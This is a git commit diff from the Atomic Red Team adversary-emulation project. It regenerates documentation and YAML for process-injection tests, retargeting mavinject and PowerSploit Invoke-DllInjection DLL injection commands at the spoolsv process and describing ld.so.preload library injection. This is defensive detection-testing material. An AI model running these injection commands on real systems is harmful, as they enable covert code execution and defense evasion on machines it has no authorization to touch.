Generate docs from job=validate_atomics_generate_docs branch=master
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
e93ed496ac
commit
ddadfbb3bf
@@ -50,11 +50,12 @@ Windows 10 Utility To Inject DLLS
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_payload | DLL to Inject | Path | PathToAtomicsFolder\T1055\src\x64\T1055.dll|
|
||||
| process_id | PID of input_arguments | Int | $pid|
|
||||
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
|
||||
|
||||
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
||||
```
|
||||
mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
```
|
||||
|
||||
|
||||
@@ -72,11 +73,12 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| dll_payload | DLL to Inject | Path | T1055.dll|
|
||||
| process_id | PID of input_arguments | Int | $pid|
|
||||
| process_id | PID of input_arguments | Int | (get-process spoolsv).id|
|
||||
|
||||
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
|
||||
```
|
||||
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
```
|
||||
|
||||
|
||||
@@ -85,7 +87,7 @@ Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - Shared Library Injection via /etc/ld.so.preload
|
||||
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
+20
-22
@@ -9640,13 +9640,13 @@ defense-evasion:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
- name: Process Injection via PowerSploit
|
||||
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
|
||||
|
||||
@@ -9661,19 +9661,18 @@ defense-evasion:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
- name: Shared Library Injection via /etc/ld.so.preload
|
||||
description: 'This test adds a shared library to the `ld.so.preload` list to
|
||||
description: "This test adds a shared library to the `ld.so.preload` list to
|
||||
execute and intercept API calls. This technique was used by threat actor Rocke
|
||||
during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
'
|
||||
\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
@@ -13005,13 +13004,13 @@ privilege-escalation:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'mavinject #{process_id} /INJECTRUNNING #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
mavinject $mypid /INJECTRUNNING #{dll_payload}
|
||||
- name: Process Injection via PowerSploit
|
||||
description: 'PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-DllInjection.ps1)
|
||||
|
||||
@@ -13026,19 +13025,18 @@ privilege-escalation:
|
||||
process_id:
|
||||
description: PID of input_arguments
|
||||
type: Int
|
||||
default: "$pid"
|
||||
default: "(get-process spoolsv).id"
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
command: 'Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
|
||||
|
||||
'
|
||||
command: |
|
||||
$mypid = #{process_id}
|
||||
Invoke-DllInjection.ps1 -ProcessID $mypid -Dll #{dll_payload}
|
||||
- name: Shared Library Injection via /etc/ld.so.preload
|
||||
description: 'This test adds a shared library to the `ld.so.preload` list to
|
||||
description: "This test adds a shared library to the `ld.so.preload` list to
|
||||
execute and intercept API calls. This technique was used by threat actor Rocke
|
||||
during the exploitation of Linux web servers. This requires the `glibc` package.
|
||||
|
||||
'
|
||||
\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
|
||||
Reference in New Issue
Block a user